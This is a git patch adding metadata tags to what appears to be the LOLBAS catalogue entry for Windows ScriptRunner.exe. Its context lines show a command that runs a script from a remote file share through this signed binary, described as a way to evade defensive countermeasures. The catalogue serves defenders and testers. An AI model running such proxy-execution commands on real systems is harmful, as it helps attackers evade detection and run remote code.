From cb302b5d137e2db17115a68214fed70c1516516c Mon Sep 17 00:00:00 2001
From: hegusung <7390383+hegusung@users.noreply.github.com>
Date: Sun, 13 Oct 2024 17:04:59 +0200
Subject: [PATCH] Update Scriptrunner.yml Tags Added Tags: - Execute: EXE - Execute: CMD - Execute: Remote
---
 yml/OSBinaries/Scriptrunner.yml | 5 +++++
 1 file changed, 5 insertions(+)
diff --git a/yml/OSBinaries/Scriptrunner.yml b/yml/OSBinaries/Scriptrunner.yml
index be2a779..4c5b141 100644
--- a/yml/OSBinaries/Scriptrunner.yml
+++ b/yml/OSBinaries/Scriptrunner.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: User
 MitreID: T1202
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+ Tags:
+ - Execute: EXE
 - Command: ScriptRunner.exe -appvscript "\\fileserver\calc.cmd"
 Description: Executes calc.cmd from remote server
 Usecase: Execute binary through proxy binary from external server to evade defensive counter measures
@@ -18,6 +20,9 @@ Commands:
 Privileges: User
 MitreID: T1218
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+ Tags:
+ - Execute: Remote
+ - Execute: CMD
 Full_Path:
 - Path: C:\Windows\System32\scriptrunner.exe
 - Path: C:\Windows\SysWOW64\scriptrunner.exe